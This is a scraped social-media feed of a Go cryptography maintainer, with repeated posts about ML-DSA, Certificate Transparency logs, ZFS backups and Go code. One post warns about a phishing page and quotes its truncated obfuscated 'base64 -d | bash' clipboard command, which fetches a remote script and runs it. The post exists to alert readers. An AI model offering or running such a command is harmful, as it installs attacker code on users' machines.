Filippo Valsorda
@filippo.abyssdomain.expert
RC F'13, F2'17
Cryptogopher / Go cryptography maintainer
Professional open source maintainer
https://filippo.io / https://github.com/FiloSottile
https://mkcert.dev / https://age-encryption.org
https://sunlight.dev / https://filippo.io/newsletter
Cryptogopher / Go cryptography maintainer
Professional open source maintainer
https://filippo.io / https://github.com/FiloSottile
https://mkcert.dev / https://age-encryption.org
https://sunlight.dev / https://filippo.io/newsletter
Oooh interesting, there is no form at the bottom of the page for me, maybe because I am outside of the US right now.
November 7, 2025 at 8:23 PM
Oooh interesting, there is no form at the bottom of the page for me, maybe because I am outside of the US right now.
As a final side-product of the new Go ML-DSA implementation, here is a set of messages that when signed cause a statistically representative distribution of rejections, allowing accurate benchmarking. github.com/C2SP/CCTV/tr...
This is the same technique as words.filippo.io/rsa-keygen-b....
This is the same technique as words.filippo.io/rsa-keygen-b....
November 5, 2025 at 12:57 AM
As a final side-product of the new Go ML-DSA implementation, here is a set of messages that when signed cause a statistically representative distribution of rejections, allowing accurate benchmarking. github.com/C2SP/CCTV/tr...
This is the same technique as words.filippo.io/rsa-keygen-b....
This is the same technique as words.filippo.io/rsa-keygen-b....
Aaaaaaaaa I found the bug that was causing ML-DSA signature generation to spin forever.
Now I want to go back on the livestream recording to find how I generated the wrong constants. I blame Python.
Now I want to go back on the livestream recording to find how I generated the wrong constants. I blame Python.
October 30, 2025 at 12:33 PM
Aaaaaaaaa I found the bug that was causing ML-DSA signature generation to spin forever.
Now I want to go back on the livestream recording to find how I generated the wrong constants. I blame Python.
Now I want to go back on the livestream recording to find how I generated the wrong constants. I blame Python.
Also, Go can be bootstrapped on multiple operating systems and architectures, from multiple C compilers, all the way to perfectly reproducible toolchain tarballs, and Source Spotter is automatically checking!
October 27, 2025 at 1:07 PM
Also, Go can be bootstrapped on multiple operating systems and architectures, from multiple C compilers, all the way to perfectly reproducible toolchain tarballs, and Source Spotter is automatically checking!
Finished work and found the gophers have finished their game and pulled out my copy of @theonion.com. Fair enough.
September 10, 2025 at 7:27 PM
Finished work and found the gophers have finished their game and pulled out my copy of @theonion.com. Fair enough.
Woke up this morning to find my gophers playing Go. Huh.
September 10, 2025 at 11:19 AM
Woke up this morning to find my gophers playing Go. Huh.
On Lobsters an unpleasant-but-technically-correct user finally got banned, and I realized that an unpopular opinion of mine is that mods are always right.
I don't care about the letter of the CoC or about transparency, even. Moderation is the human and nuanced job that shapes a community.
I don't care about the letter of the CoC or about transparency, even. Moderation is the human and nuanced job that shapes a community.
August 31, 2025 at 1:54 PM
On Lobsters an unpleasant-but-technically-correct user finally got banned, and I realized that an unpopular opinion of mine is that mods are always right.
I don't care about the letter of the CoC or about transparency, even. Moderation is the human and nuanced job that shapes a community.
I don't care about the letter of the CoC or about transparency, even. Moderation is the human and nuanced job that shapes a community.
My webmail handles that differently, so I was stabbing a bit in the dark, but I tweaked it and re-sent it to you, could you check if it's better?
(And thank you! ✨)
(And thank you! ✨)
August 14, 2025 at 12:15 PM
My webmail handles that differently, so I was stabbing a bit in the dark, but I tweaked it and re-sent it to you, could you check if it's better?
(And thank you! ✨)
(And thank you! ✨)
lol Python is so useless
This programming thing is clearly a bubble.
This programming thing is clearly a bubble.
August 8, 2025 at 11:01 AM
lol Python is so useless
This programming thing is clearly a bubble.
This programming thing is clearly a bubble.
☕️ 🚓 🔥 🇫🇷 🐳 ✨ 🎣 👀
July 31, 2025 at 5:10 PM
☕️ 🚓 🔥 🇫🇷 🐳 ✨ 🎣 👀
I made a zero-maintenance way to keep a backup of your PDS repository in case you ever need to do an adversarial migration.
github.com/FiloSottile/...
A template that sets up a daily GitHub Actions backup with goat.
Based on git-scraper-template by @simonwillison.net.
github.com/FiloSottile/...
A template that sets up a daily GitHub Actions backup with goat.
Based on git-scraper-template by @simonwillison.net.
July 29, 2025 at 12:08 AM
I made a zero-maintenance way to keep a backup of your PDS repository in case you ever need to do an adversarial migration.
github.com/FiloSottile/...
A template that sets up a daily GitHub Actions backup with goat.
Based on git-scraper-template by @simonwillison.net.
github.com/FiloSottile/...
A template that sets up a daily GitHub Actions backup with goat.
Based on git-scraper-template by @simonwillison.net.
I want to set up append-only backups with ZFS, like ruderich.org/simon/notes/....
However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.
Does ZFS replication unavoidably trust the sender?
However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.
Does ZFS replication unavoidably trust the sender?
July 21, 2025 at 11:36 AM
I want to set up append-only backups with ZFS, like ruderich.org/simon/notes/....
However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.
Does ZFS replication unavoidably trust the sender?
However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.
Does ZFS replication unavoidably trust the sender?
This is pretty well executed phishing.
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script gist.github.com/FiloSottile/... into bash.
They even detect piping, so to read it you have to run "curl | cat".
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script gist.github.com/FiloSottile/... into bash.
They even detect piping, so to read it you have to run "curl | cat".
July 17, 2025 at 11:00 AM
This is pretty well executed phishing.
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script gist.github.com/FiloSottile/... into bash.
They even detect piping, so to read it you have to run "curl | cat".
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script gist.github.com/FiloSottile/... into bash.
They even detect piping, so to read it you have to run "curl | cat".
Well, I implemented a Merkle PATRICIA Trie in SQLite.
No, not on top of SQLite. In SQLite.
WITH RECURSIVE plus WITHOUT ROWID plus a small app-defined function.
Might be time to stop.
(This is for a very cool verifiable transparency log indexing thing.)
No, not on top of SQLite. In SQLite.
WITH RECURSIVE plus WITHOUT ROWID plus a small app-defined function.
Might be time to stop.
(This is for a very cool verifiable transparency log indexing thing.)
June 5, 2025 at 10:58 PM
Well, I implemented a Merkle PATRICIA Trie in SQLite.
No, not on top of SQLite. In SQLite.
WITH RECURSIVE plus WITHOUT ROWID plus a small app-defined function.
Might be time to stop.
(This is for a very cool verifiable transparency log indexing thing.)
No, not on top of SQLite. In SQLite.
WITH RECURSIVE plus WITHOUT ROWID plus a small app-defined function.
Might be time to stop.
(This is for a very cool verifiable transparency log indexing thing.)
Had fun recording a @fallthrough.fm episode yesterday with @cpu.xkeyscore.club, chatting about Geomys and open source maintenance.
I appreciated the forced opportunity to give an overdue update on how we're doing. In short, it has been sustainably chugging along, working exactly as intended!
I appreciated the forced opportunity to give an overdue update on how we're doing. In short, it has been sustainably chugging along, working exactly as intended!
May 23, 2025 at 8:01 PM
Had fun recording a @fallthrough.fm episode yesterday with @cpu.xkeyscore.club, chatting about Geomys and open source maintenance.
I appreciated the forced opportunity to give an overdue update on how we're doing. In short, it has been sustainably chugging along, working exactly as intended!
I appreciated the forced opportunity to give an overdue update on how we're doing. In short, it has been sustainably chugging along, working exactly as intended!
Made a little web server to unlock and mount encrypted ZFS datasets using passkeys and age.
What's neat is that the password never touches the client! Attackers need to compromise *first* the server, and *then* the passkey.
It's delightfully little code. https://github.com/FiloSottile/mostly-harml
What's neat is that the password never touches the client! Attackers need to compromise *first* the server, and *then* the passkey.
It's delightfully little code. https://github.com/FiloSottile/mostly-harml
May 10, 2025 at 10:15 PM
Made a little web server to unlock and mount encrypted ZFS datasets using passkeys and age.
What's neat is that the password never touches the client! Attackers need to compromise *first* the server, and *then* the passkey.
It's delightfully little code. https://github.com/FiloSottile/mostly-harml
What's neat is that the password never touches the client! Attackers need to compromise *first* the server, and *then* the passkey.
It's delightfully little code. https://github.com/FiloSottile/mostly-harml
Very excited to submit the Tuscolo Certificate Transparency logs for inclusion today! 🧾🪵☀️
These logs are Sunlight-based, and operated by Geomys and Port 179 LTD on bare metal. They cost 50 times less than RFC 6962 logs in the cloud.
https://groups.google.com/a/chromium.org/g/ct-policy/c/KCzYEIIZSx
These logs are Sunlight-based, and operated by Geomys and Port 179 LTD on bare metal. They cost 50 times less than RFC 6962 logs in the cloud.
https://groups.google.com/a/chromium.org/g/ct-policy/c/KCzYEIIZSx
May 9, 2025 at 4:36 PM
Very excited to submit the Tuscolo Certificate Transparency logs for inclusion today! 🧾🪵☀️
These logs are Sunlight-based, and operated by Geomys and Port 179 LTD on bare metal. They cost 50 times less than RFC 6962 logs in the cloud.
https://groups.google.com/a/chromium.org/g/ct-policy/c/KCzYEIIZSx
These logs are Sunlight-based, and operated by Geomys and Port 179 LTD on bare metal. They cost 50 times less than RFC 6962 logs in the cloud.
https://groups.google.com/a/chromium.org/g/ct-policy/c/KCzYEIIZSx
Why is the latest version of uBlock Origin Lite asking permission to access all websites now?
I love uBO Lite precisely because it doesn't make me trust an extension developer with all my browser security...
(Let's not re-debate MV3 unnecessarily please. Will block.)
I love uBO Lite precisely because it doesn't make me trust an extension developer with all my browser security...
(Let's not re-debate MV3 unnecessarily please. Will block.)
April 17, 2025 at 5:34 PM
Why is the latest version of uBlock Origin Lite asking permission to access all websites now?
I love uBO Lite precisely because it doesn't make me trust an extension developer with all my browser security...
(Let's not re-debate MV3 unnecessarily please. Will block.)
I love uBO Lite precisely because it doesn't make me trust an extension developer with all my browser security...
(Let's not re-debate MV3 unnecessarily please. Will block.)
Y’all they’re playing Shakespeare’s Julius Caesar IN THE ACTUAL SPOT WHERE HE WAS MURDERED. Apparently for the first time. Great omen.
March 15, 2025 at 6:17 PM
Y’all they’re playing Shakespeare’s Julius Caesar IN THE ACTUAL SPOT WHERE HE WAS MURDERED. Apparently for the first time. Great omen.
Hah, with all the FIPS 140 work of Go 1.24 I ended up the contributor with the most commits to the Go repository in the last 12 months.
I wonder if it's the first time it's a non-Googler.
(This is all for fun, commit count is not much of a metric, although they are all individually code reviewed.)
I wonder if it's the first time it's a non-Googler.
(This is all for fun, commit count is not much of a metric, although they are all individually code reviewed.)
March 5, 2025 at 3:33 PM
Hah, with all the FIPS 140 work of Go 1.24 I ended up the contributor with the most commits to the Go repository in the last 12 months.
I wonder if it's the first time it's a non-Googler.
(This is all for fun, commit count is not much of a metric, although they are all individually code reviewed.)
I wonder if it's the first time it's a non-Googler.
(This is all for fun, commit count is not much of a metric, although they are all individually code reviewed.)
Hrm… this sounds extremely disruptive. Often when I have a conflict I’m halfway through rebasing a stack.
I get why you can’t target it for a broadly useful product, but jj’s way to handle conflicts would work so well with a LLM tool.
I get why you can’t target it for a broadly useful product, but jj’s way to handle conflicts would work so well with a LLM tool.
January 30, 2025 at 9:28 AM
Hrm… this sounds extremely disruptive. Often when I have a conflict I’m halfway through rebasing a stack.
I get why you can’t target it for a broadly useful product, but jj’s way to handle conflicts would work so well with a LLM tool.
I get why you can’t target it for a broadly useful product, but jj’s way to handle conflicts would work so well with a LLM tool.
Oh thank goodness. Never been more relieved of getting a talk rejected.
There was no way to deliver a good talk on this without making enemies 😅
There was no way to deliver a good talk on this without making enemies 😅
![Email from RWC 2025 program chairs.
[rwc2025] Rejected
submission #129 "Learning to live with FIPS 140"
Dear author,
The Real World Cryptography 2025 (rwc2025) program committee is sorry to inform you that your submission #129 was rejected, and will not appear in the conference.
* Title: Learning to live with FIPS 140
* Author: Filippo Valsorda (The Go Project)](https://cdn.bsky.app/img/feed_thumbnail/plain/did:plc:x2nsupeeo52oznrmplwapppl/bafkreibk3gjs4qwop43wuqyzglrofwdyn3nrqz6apefipm4jahslzuq57e@jpeg)
January 24, 2025 at 10:54 AM
Oh thank goodness. Never been more relieved of getting a talk rejected.
There was no way to deliver a good talk on this without making enemies 😅
There was no way to deliver a good talk on this without making enemies 😅
weak.Pointer (Go 1.24+), runtime.AddCleanup (Go 1.24+), and sync.Map combine wonderfully into a 20-lines weak map. #golang
It associates values to keys, with automatic garbage collection once the key becomes unreachable. Using it to tie precomputed FIPS keys to PrivateKey values we can't modify.
It associates values to keys, with automatic garbage collection once the key becomes unreachable. Using it to tie precomputed FIPS keys to PrivateKey values we can't modify.
![type Cache[K, V any] struct {
m sync.Map
}
// Get returns the result of new.
//
// If Get was called on k before and didn't return an error, Get will return the
// same value it returned from the previous call.
//
// If Get is called concurrently on the same k value, new might get called
// multiple times. All calls will return the same value or an error from new.
//
// The cache is evicted some time after k becomes unreachable.
func (c *Cache[K, V]) Get(k *K, new func() (*V, error)) (*V, error) {
p := weak.Make(k)
if cached, ok := c.m.Load(p); ok {
return cached.(*V), nil
}
v, err := new()
if err != nil {
return nil, err
}
if cached, loaded := c.m.LoadOrStore(p, v); loaded {
// We lost the race, return the cached value and discard ours.
return cached.(*V), nil
}
runtime.AddCleanup(k, c.evict, p)
return v, nil
}
func (c *Cache[K, V]) evict(p weak.Pointer[K]) {
c.m.Delete(p)
}](https://cdn.bsky.app/img/feed_thumbnail/plain/did:plc:x2nsupeeo52oznrmplwapppl/bafkreieim4wanlcu5wlb34hzkw7xdhyihsx3buwtltvtnv2g3xqtngdgyu@jpeg)
January 23, 2025 at 1:42 PM
weak.Pointer (Go 1.24+), runtime.AddCleanup (Go 1.24+), and sync.Map combine wonderfully into a 20-lines weak map. #golang
It associates values to keys, with automatic garbage collection once the key becomes unreachable. Using it to tie precomputed FIPS keys to PrivateKey values we can't modify.
It associates values to keys, with automatic garbage collection once the key becomes unreachable. Using it to tie precomputed FIPS keys to PrivateKey values we can't modify.